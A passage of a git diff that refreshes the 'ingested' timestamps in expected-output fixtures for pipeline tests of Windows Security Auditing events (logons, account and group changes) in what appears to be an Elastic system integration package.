+ "ingested": "2021-12-09T13:45:52.108288400Z",
 "code": "4770",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
index 6ad77df55d1..a9bd7c27946 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json
@@ -73,7 +73,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-10-19T11:55:22.001023400Z",
+ "ingested": "2021-12-09T13:45:52.303560800Z",
 "code": "4771",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
index 74a62480bd1..d77ad8dd952 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json
@@ -59,7 +59,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.275786966Z",
+ "ingested": "2021-12-09T13:45:52.499134700Z",
 "code": "4776",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
index c14a0668c8e..1debe07b396 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json
@@ -66,7 +66,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.375037127Z",
+ "ingested": "2021-12-09T13:45:52.652424900Z",
 "code": "4778",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
index ab5839fcf72..9ca3a755534 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json
@@ -66,7 +66,7 @@
 "name": "DC_TEST2k12.TEST.SAAS"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.475421027Z",
+ "ingested": "2021-12-09T13:45:52.832864500Z",
 "code": "4779",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
index 4c32bf66d91..587d54b2f61 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json
@@ -79,7 +79,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557027317Z",
+ "ingested": "2021-12-09T13:45:53.021187300Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -177,7 +177,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557029717Z",
+ "ingested": "2021-12-09T13:45:53.021197900Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -281,7 +281,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557030314Z",
+ "ingested": "2021-12-09T13:45:53.021202700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -379,7 +379,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557030851Z",
+ "ingested": "2021-12-09T13:45:53.021209700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -476,7 +476,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557031388Z",
+ "ingested": "2021-12-09T13:45:53.021216800Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -573,7 +573,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557031880Z",
+ "ingested": "2021-12-09T13:45:53.021221100Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -670,7 +670,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557032362Z",
+ "ingested": "2021-12-09T13:45:53.021226100Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -767,7 +767,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557032857Z",
+ "ingested": "2021-12-09T13:45:53.021232300Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -867,7 +867,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557033352Z",
+ "ingested": "2021-12-09T13:45:53.021237Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -965,7 +965,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557033830Z",
+ "ingested": "2021-12-09T13:45:53.021241700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1069,7 +1069,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557034321Z",
+ "ingested": "2021-12-09T13:45:53.021256600Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1167,7 +1167,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557035008Z",
+ "ingested": "2021-12-09T13:45:53.021263700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1265,7 +1265,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557035592Z",
+ "ingested": "2021-12-09T13:45:53.021268500Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1363,7 +1363,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557036089Z",
+ "ingested": "2021-12-09T13:45:53.021273500Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1461,7 +1461,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557036568Z",
+ "ingested": "2021-12-09T13:45:53.021278700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1559,7 +1559,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557037042Z",
+ "ingested": "2021-12-09T13:45:53.021284800Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1657,7 +1657,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557037642Z",
+ "ingested": "2021-12-09T13:45:53.021288700Z",
 "code": "4624",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -1764,7 +1764,7 @@
 "name": "vagrant-2012-r2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:07.557038126Z",
+ "ingested": "2021-12-09T13:45:53.021294600Z",
 "code": "4625",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
index 6a6e2b63138..c123e615d29 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.016591Z",
+ "ingested": "2021-12-09T13:45:56.799158900Z",
 "code": "4722",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -149,7 +149,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.016600700Z",
+ "ingested": "2021-12-09T13:45:56.799168200Z",
 "code": "4722",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
index 547487c3a26..164fe82a6de 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.450128800Z",
+ "ingested": "2021-12-09T13:45:57.198644900Z",
 "code": "4723",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -149,7 +149,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.450137Z",
+ "ingested": "2021-12-09T13:45:57.198653Z",
 "code": "4723",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
index 5078f6c3a20..b7f1cf2b80f 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.912761300Z",
+ "ingested": "2021-12-09T13:45:57.605360600Z",
 "code": "4724",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -149,7 +149,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:27.912770100Z",
+ "ingested": "2021-12-09T13:45:57.605370200Z",
 "code": "4724",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
index df4a98ae603..c26ffa0750d 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:28.349650400Z",
+ "ingested": "2021-12-09T13:45:58.018706300Z",
 "code": "4725",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -149,7 +149,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:28.349659100Z",
+ "ingested": "2021-12-09T13:45:58.018715100Z",
 "code": "4725",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
index aa0d1f55a04..bdab733d2f2 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:28.808472500Z",
+ "ingested": "2021-12-09T13:45:58.420324500Z",
 "code": "4726",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -151,7 +151,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:28.808476700Z",
+ "ingested": "2021-12-09T13:45:58.420333100Z",
 "code": "4726",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
index 66ae340e1d8..92adf9049a7 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:10.379171485Z",
+ "ingested": "2021-12-09T13:45:58.829765Z",
 "code": "4727",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
index 35a41c63fe4..29d7429c1ef 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:29.482838600Z",
+ "ingested": "2021-12-09T13:45:59.028797700Z",
 "code": "4728",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
index aa28440ea04..4e789547880 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:29.782306700Z",
+ "ingested": "2021-12-09T13:45:59.290038500Z",
 "code": "4729",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
index 0dc0f2df366..086659daf0f 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:10.708586706Z",
+ "ingested": "2021-12-09T13:45:59.545413300Z",
 "code": "4730",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
index b8970540c34..285251fdbc5 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:10.823906963Z",
+ "ingested": "2021-12-09T13:45:59.740385600Z",
 "code": "4731",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
index a77ae6e8509..afd3ede3ac9 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:30.491308800Z",
+ "ingested": "2021-12-09T13:45:59.938327700Z",
 "code": "4732",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
index c0fd8104160..bd3c9c7ce45 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:30.760815900Z",
+ "ingested": "2021-12-09T13:46:00.202622100Z",
 "code": "4733",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
index a9ced611542..c17617e0863 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:11.152463009Z",
+ "ingested": "2021-12-09T13:46:00.463978200Z",
 "code": "4734",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
index 597b2854c1a..dd81014c585 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:11.247659690Z",
+ "ingested": "2021-12-09T13:46:00.656014200Z",
 "code": "4735",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
index 8da8b088c21..a5a85ef7dbb 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4737.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:11.359274337Z",
+ "ingested": "2021-12-09T13:46:00.856335200Z",
 "code": "4737",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
index ed72a29d7ba..009c5a333ee 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4738-account-changed.json-expected.json
@@ -88,7 +88,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:31.700998400Z",
+ "ingested": "2021-12-09T13:46:01.054603700Z",
 "code": "4738",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
index fbf132d5e57..95558c460f5 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4740-account-locked-out.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:31.973015500Z",
+ "ingested": "2021-12-09T13:46:01.309395100Z",
 "code": "4740",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
index 98936ddd724..c03c1549d86 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4754.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:11.708171901Z",
+ "ingested": "2021-12-09T13:46:01.534580700Z",
 "code": "4754",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
index 3c06f66ca45..b105ecd48d6 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4755.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:11.832228149Z",
+ "ingested": "2021-12-09T13:46:01.729553600Z",
 "code": "4755",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
index 76ea0c8c6ed..923556d58fd 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4756.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:32.637206400Z",
+ "ingested": "2021-12-09T13:46:01.936912200Z",
 "code": "4756",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
index ad78bc1f3a9..9e51f4f2ef9 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4757.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-10-19T11:55:32.941287Z",
+ "ingested": "2021-12-09T13:46:02.212799Z",
 "code": "4757",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
index 412f1496f45..629aa9d4fd9 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4758.json-expected.json
@@ -61,7 +61,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:12.161947534Z",
+ "ingested": "2021-12-09T13:46:02.470400500Z",
 "code": "4758",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
index 62745ca7d0d..d880de8ee79 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4764.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR.wlbeat.local"
 },
 "event": {
- "ingested": "2021-07-30T21:06:12.251549200Z",
+ "ingested": "2021-12-09T13:46:02.674299700Z",
 "code": "4764",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
index 6842c9bb8df..70030989636 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4767-account-unlocked.json-expected.json
@@ -62,7 +62,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:33.688576100Z",
+ "ingested": "2021-12-09T13:46:02.863165Z",
 "code": "4767",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
index 9655c6a469e..d36f2e08438 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4781-account-renamed.json-expected.json
@@ -65,7 +65,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:33.918515Z",
+ "ingested": "2021-12-09T13:46:03.085219100Z",
 "code": "4781",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
@@ -156,7 +156,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:33.918523800Z",
+ "ingested": "2021-12-09T13:46:03.085223200Z",
 "code": "4781",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
index c2fa40482a3..ed2647237a8 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4798.json-expected.json
@@ -64,7 +64,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-10-19T11:55:34.345020800Z",
+ "ingested": "2021-12-09T13:46:03.473678500Z",
 "code": "4798",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
index 13fc731f171..684f24c0a0b 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
+++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4799.json-expected.json
@@ -63,7 +63,7 @@
 "name": "WIN-41OB2LO92CR"
 },
 "event": {
- "ingested": "2021-07-30T21:06:12.712469394Z",
+ "ingested": "2021-12-09T13:46:03.692317800Z",
 "code": "4799",
 "provider": "Microsoft-Windows-Security-Auditing",
 "kind": "event",
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
index a5367b1d769..bab7d156087 100644
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-logoff.json-expected.json
